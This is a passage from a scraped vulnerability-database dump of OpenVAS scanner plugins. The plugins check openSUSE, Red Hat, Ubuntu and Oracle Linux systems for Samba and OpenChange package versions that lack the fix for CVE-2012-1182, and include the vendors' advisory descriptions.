rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-x86\", 
rpm:\"libtevent0-x86~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", rpm:\"samba-client-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-23T13:10:11", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "openvas", "title": "RedHat Update for samba4 RHSA-2013:0506-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:870935", "href": "http://plugins.openvas.org/nasl.php?oid=870935", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n#\n# RedHat Update for samba4 RHSA-2013:0506-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n\n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. 
SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n\n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, Samba4\n Package Support in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n\n This update also fixes the following bug:\n\n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by wbinfo -n or\n wbinfo -s commands. Consequently, looking up users using the wbinfo tool\n failed. 
This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n\n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n\n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named samba4 to avoid conflicts during the\n upgrade.\";\n\n\ntag_affected = \"samba4 on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00049.html\");\n script_id(870935);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:23 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0506-02\");\n script_name(\"RedHat Update for samba4 RHSA-2013:0506-02\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-debuginfo\", rpm:\"samba4-debuginfo~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "openvas", "title": "RedHat Update for openchange RHSA-2013:0515-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870928", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870928", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openchange RHSA-2013:0515-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00055.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870928\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:03 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0515-02\");\n script_name(\"RedHat Update for openchange RHSA-2013:0515-02\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openchange'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"openchange on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. 
This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-debuginfo\", rpm:\"evolution-mapi-debuginfo~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-debuginfo\", rpm:\"openchange-debuginfo~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:20:38", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1423-1", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "openvas", "title": "Ubuntu Update for samba USN-1423-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840980", "href": "http://plugins.openvas.org/nasl.php?oid=840980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1423_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for samba USN-1423-1\n#\n# Authors:\n# System 
Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Brian Gorenc discovered that Samba incorrectly calculated array bounds when\n handling remote procedure calls (RPC) over the network. A remote,\n unauthenticated attacker could exploit this to execute arbitrary code as the\n root user. 
(CVE-2012-1182)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1423-1\";\ntag_affected = \"samba on Ubuntu 11.10 ,\n Ubuntu 11.04 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1423-1/\");\n script_id(840980);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-13 10:33:26 +0530 (Fri, 13 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1423-1\");\n script_name(\"Ubuntu Update for samba USN-1423-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.4.7~dfsg-1ubuntu3.9\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = 
isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.11~dfsg-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.8~dfsg-1ubuntu2.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"3.0.28a-1ubuntu4.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:08", "description": "Check for the Version of samba3x", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba3x RHSA-2012:0466-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:870584", "href": "http://plugins.openvas.org/nasl.php?oid=870584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba3x RHSA-2012:0466-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba3x on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00003.html\");\n script_id(870584);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:47 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name: \"RHSA\", value: \"2012:0466-01\");\n script_name(\"RedHat Update for samba3x RHSA-2012:0466-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba3x\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", 
rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-debuginfo\", rpm:\"samba3x-debuginfo~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:48", "description": "Oracle Linux Local Security Checks ELSA-2013-0515", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0515", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123690", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0515.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen 
<eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123690\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:16 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0515\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0515 - openchange security, bug fix and enhancement update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0515\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0515.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n 